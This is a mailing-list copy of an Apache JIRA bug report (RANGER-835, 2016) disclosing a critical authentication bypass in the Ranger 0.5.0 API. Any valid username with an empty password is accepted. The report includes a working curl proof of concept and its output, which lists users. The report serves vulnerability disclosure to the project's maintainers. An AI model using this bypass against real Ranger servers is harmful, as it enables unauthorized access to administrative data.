You are viewing a plain text version of this content. The canonical link for it is here.

Posted to dev@ranger.apache.org by "Jim Halfpenny (JIRA)" <ji...@apache.org> on 2016/02/05 12:51:39 UTC

[jira] [Created] (RANGER-835) Authentication bypass in Ranger API

Jim Halfpenny created RANGER-835:
------------------------------------

             Summary: Authentication bypass in Ranger API
                 Key: RANGER-835
                 URL: https://issues.apache.org/jira/browse/RANGER-835
             Project: Ranger
          Issue Type: Bug
          Components: Ranger
    Affects Versions: 0.5.0
            Reporter: Jim Halfpenny
            Priority: Critical


Authentication to the Ranger API can be trivially bypassed by sending a valid username along with a null password. API authentication appears to work correctly, rejecting requests if the password is incorrect but allows requests where no password has been sent.

The example below uses curl to demonstrate this issue by retrieving a list of the users.

$ curl -u admin: -v http://127.0.0.1:6080/service/xusers/users
*   Trying 127.0.0.1...
* Connected to 127.0.0.1 (127.0.0.1) port 6080 (#0)
* Server auth using Basic with user 'admin'
> HEAD /service/xusers/users HTTP/1.1
> Host: 127.0.0.1:6080
> Authorization: Basic YWRtaW46
> User-Agent: curl/7.43.0
> Accept: */*
> 
< HTTP/1.1 200 OK
< Server: Apache-Coyote/1.1
< Set-Cookie: JSESSIONID=96458E9E9A792D794D8C0D23839CFFC9; Path=/; HttpOnly
< Content-Type: application/xml
< Content-Length: 0
< Date: Fri, 05 Feb 2016 11:41:16 GMT
< 
<?xml version="1.0" encoding="UTF-8" standalone="yes"?><vxUserList><resultSize>48</resultSize><vXUsers>...



--
This message was sent by Atlassian JIRA
(v6.3.4#6332)